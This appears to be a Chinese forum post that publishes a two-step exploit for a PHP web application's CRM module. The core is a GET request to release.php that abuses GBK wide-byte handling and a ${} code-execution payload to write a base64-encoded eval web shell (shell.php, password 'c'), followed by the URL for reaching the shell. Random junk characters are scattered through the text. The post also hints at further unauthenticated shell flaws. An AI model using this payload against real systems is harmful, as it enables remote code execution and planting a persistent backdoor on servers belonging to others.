此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.) z: ]( R2 i3 {6 }' }6 w- \
! f# Z* w& }# Y$ o. ~
* d% e `( ~+ x1 CEXP:3 y, K/ C4 B8 s2 a
) H! R& S( j. d4 T. u5 ]# ?( p
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}3 s1 d+ B+ Z. v0 j% a
2 _/ o. K' B6 Q ^: k3 z
第二步: [GET]http://site/general/email/index.php
7 z5 J9 K. \# A# r# A
+ i- M2 V2 j3 B: P" Z! H7 VSHELL: http://site/general/email/shell.php 密码C* }# w! P0 z; o& X5 o$ T
% p% @9 F+ \$ x- V- @3 N
" @) Z1 y( m! l2 j& ^' {& {此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好2 C# M' y3 W$ H' U" Q
# I4 ]# a3 E& F. V2 B' V1 A& C有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~, S+ D) i1 P4 P; p6 x) K
' t. V) D6 r! |6 c
) Y V+ k" H, B* I: l |